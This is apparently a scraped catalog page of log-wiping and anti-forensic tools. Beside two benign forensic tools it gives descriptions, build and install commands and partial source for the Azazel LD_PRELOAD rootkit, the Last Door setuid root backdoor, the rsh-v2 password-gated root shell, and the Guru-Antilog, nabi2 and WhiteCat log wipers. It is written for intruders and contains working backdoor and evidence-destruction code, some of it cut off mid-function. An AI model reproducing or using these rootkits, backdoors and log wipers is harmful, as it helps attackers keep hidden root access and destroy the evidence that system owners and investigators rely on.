Deletion

Tools to remove files, usually dealing with log wiping or secure deletion

Foremost

Foremost is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.

HxD

HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.
The easy to use interface offers features such as searching and replacing, exporting, checksums/digests, insertion of byte patterns, a file shredder, concatenation or splitting of files, statistics and much more.Editing works like in a text editor with a focus on a simple and task-oriented operation, as such functions were streamlined to hide differences that are purely technical.For example, drives and memory are presented similar to a file and are shown as a whole, in contrast to a sector/region-limited view that cuts off data which potentially belongs together. Drives and memory can be edited the same way as a regular file including support for undo. In addition memory-sections define a foldable region and inaccessible sections are hidden by default.

Operating System:
Windows 95, 98, ME, NT 4, 2000, XP, 2003, Vista, or 7

Azazel

Azazel is a userland rootkit written in C based off of the original LD_PRELOAD technique from Jynx rootkit. It is more robust and has additional features, and focuses heavily around anti-debugging and anti-detection. Features include log cleaning, pcap subversion, and more.

Features:
Anti-debugging
Avoids unhide, lsof, ps, ldd detection
Hides files and directories
Hides remote connections
Hides processes
Hides logins
PCAP hooks avoid local sniffing
Two accept backdoors with full PTY shells.

Crypthook encrypted accept() backdoor
Plaintext accept() backdoor

PAM backdoor for local privesc and remote entry
Log cleanup for utmp/wtmp entries based on pty
Uses xor to obfuscate static strings

Installation:
Clone the sources
localhost:~ $ git clone https://github.com/chokepoint/azazel.git

Build the rootkit
localhost:~ $ make

Hooking Methods
Azazel utilizes the same hooking methods as Jynx/Jynx2. You can hook individual programs at the time of execution by taking advantage of the LD_PRELOAD variable. By default, Azazel installs itself as libselinux.so into /lib. An entry is then added to /etc/ld.so.preload in order to hook system wide dynamically compiled programs.

Example runtime hooking of bash.
localhost:~ $ LD_PRELOAD=/lib/libselinux.so bash -l

Instead of dlsym'ing direct libc functions by globally declaring old_syscall, Azazel has a new structure in azazel.h named syscall_list.
This allows all of the required functions to be linked upon initiation of the library.
Syscall function names are XORed by config.py and written to const.h
Original libc functions can be accessed by using the preprocessor definitions also in const.h
Each definition has a prefix of SYS_name_of_function_in_caps.
For example to call libc's version of fopen, you would use syscalls[SYS_FOPEN].syscall_func();
typedef struct struct_syscalls {

Linux Log Eraser

Linux Log Eraser is a set of shell scripts that will cleanly search for specific data in log files and wipe it.

Last Door Log Wiper

Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.

 ___________
|           |Linux
|<Last|Door>|Root-
| --------- |Backdoor
|         O |&
|           |Log-
|           |Cleaner
|___________|~r0ng

Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)

Release Dec 2012 -V1

For a full writeup of the program, please visit my blog, URL above.

[+] What is it?

It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.

[+] Features?

- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
   - Search string replace with new string (e.g. change your ip in the logs)
   - Search string delete string
   - Search string delete line
   - Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
   - User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
   - If you don't logout prior to the process starting, the file search process will be displayed
   - If you do logout prior to the process starting this will allow your .bash_history to refresh
     and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?

- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)

- non-rootuser:~# /bin/LastDoor (run!)

whitecat.c

WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.

/*
 *  This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
 *  It supports perl compatible regular expressions and cleans any binary and
 *  text log files (just correct source a little). WhiteCat is designed for
 *  any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
 *  Use it only for educational purpose.
 *  Don't forget to visit our site and my homepage for new releases:
 *  <a href="http://hellknights.void.ru<br />
" title="http://hellknights.void.ru<br />
">http://hellknights.void.ru<br />
</a> *  <a href="http://shados.0x48k.cc<br />
" title="http://shados.0x48k.cc<br />
">http://shados.0x48k.cc<br />
</a> *  Also, you can mail me any bugs or suggestions:
 *  <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ real.xakep.ru
 *  <a href="mailto:shados" title="mailto:shados">mailto:shados</a> /\./\ 0x48k.cc
 *
 *  Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2, or (at your option)
 *  any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software Foundation,
 *  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.  
 */

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>


#ifndef UTMP_FILE
    #define UTMP_FILE "/var/run/utmp"
#endif    
#ifndef WTMP_FILE
    #define WTMP_FILE "/var/log/wtmp"
#endif

Guru-Antilog.sh

A bash script to wipe or exchange your IP in unix log files. Also wipes out /root/.bash_history.

#!/bin/bash
# Guru-Antilog V 0.1
# usage : to Exchanging your IP with fake IP y0 choose it
# and to clear your last command's and clear logout history  
# Remember that...
# y0 have one minute to logout from b0x no more.. so be carefull
# Fuck the whitehats
#
clear
echo "--------------------------------------------------------------------------------------------------------------------"
echo "                     Guru-Antilog c0ded  By [ sAFA7_eLNeT ] (SecurityGurus.NeT) - SecurityGurus[AT]irc.dal.net:6667 "
echo "  Greetz g0es to : Acid-WarZ,rOCk-MaStEr,j7a,MedoZero,Spiderz,and all SecurityGurus.NeT PPL and all 1--5.com folks "
echo "--------------------------------------------------------------------------------------------------------------------"
if [ "$UID" = "0" ];then
echo " h3re w3 g0 "
else
echo " `whoami` y0 must be login by root"
fi
echo -n " What's the ip y0 want to spoof it ?  "
read word
word=$word
echo -n " What's the Fake ip y0 want  using it ? "
read fake
fake=$fake
r0x="yes"
if [ ! -f /var/log/lastlog ]; then
r0x="no"
echo " i can't find lastlog"
fi
if [ "$r0x" = "yes" ]; then
echo " Editing lastlog"
sed "s/$word/$fake/g" /var/log/lastlog > /var/log/lastlog.new
mv /var/log/lastlog.new /var/log/lastlog
fi
syslog="yes"
if [ ! -f /var/log/syslog ]; then
echo " i can't find syslog"
 syslog="no"
fi
if [ "$syslog" = "yes" ]; then
echo " Editing syslog"
sed "s/$word/$fake/g" /var/log/syslog > /var/log/syslog.new
mv /var/log/syslog.new /var/log/syslog
fi
mess="yes"
if [ ! -f /var/log/messages ]; then
 echo " i can't find message "
mess="no"
fi
if [ "$mess" = "yes" ]; then
echo " Editing message"
sed "s/$word/$fake/g" /var/log/messages > /var/log/messages.new
mv /var/log/messages.new /var/log/messages
fi
http="yes"
if [ ! -f /var/log/httpd/access_log ]; then
 echo " i can't find access_log "

rsh-v2.c

Unix log cleaner that also checks to see if root is logged in.

/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2
*/

#include
#include
#include
#include
#include
#include
#include
#include

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

nabi2.c

Nabi version 2.0 - Advanced /var log wiper for Linux.

/*

     Advanced /var log wiper for linux

     nabi ver 2 ( friendly zap2.c )


    Release Date:
    nabi ver 2 - 3.8 2006 (Wed)
         nabi ver 1 - 1.15 2006 (Sun)
 
  1: zap2)
      # ./nabi -z root
  2: history cleanup)
      # ./nabi -h
  3: string change)
      # ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
      # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )

    Tested on:
      - Debian 3.0r1
      - RH 9.0
      - Fedora core 2
      ..

    CHANGED:
      - add program option parser for split features on this file.
      - erased minor version number of this program.

    BUG FIXED:
      - when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
        cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
        see escape_slash().
   
  comment:
    i become a curious guy when i'm typing some code. what about you all?
    for more useful toolkit. brb!

   
*/



#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define MAX_PATH        1024
#define MAX_DEPTH       128

#define  PROGRAM      "Nabi ver 2 ( <a href="mailto:[email protected]">[email protected]</a> )"


/*
#define DEBUG
*/


/* proto type */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);

/* linked-list stuffs for file list */
struct file_list
{
        struct file_list *next;
        int depth;
        char d_name[MAX_PATH];
} *head, *tail;

static char root_dir[] = "/var";

int main(int argc, char *argv[])
{
        struct dirent *dp;

RopeADope

#!/usr/bin/env python
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# Ropeadope.py -- RopeADope v1.1                                               #
#                                                                              #
# DATE                                                                         #
# 04/20/2012                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# A linux log cleaner                                                          #
#                                                                              #
# AUTHOR                                                                       #
# pr1me [at] highhacksociety [dot] com                                         #
# <a href="http://www.nullsecurity.net/" title="http://www.nullsecurity.net/">http://www.nullsecurity.net/</a> - <a href="http://www.highhacksociety" title="http://www.highhacksociety">http://www.highhacksociety</a>                    #
#                                                                              #
################################################################################

Syndicate content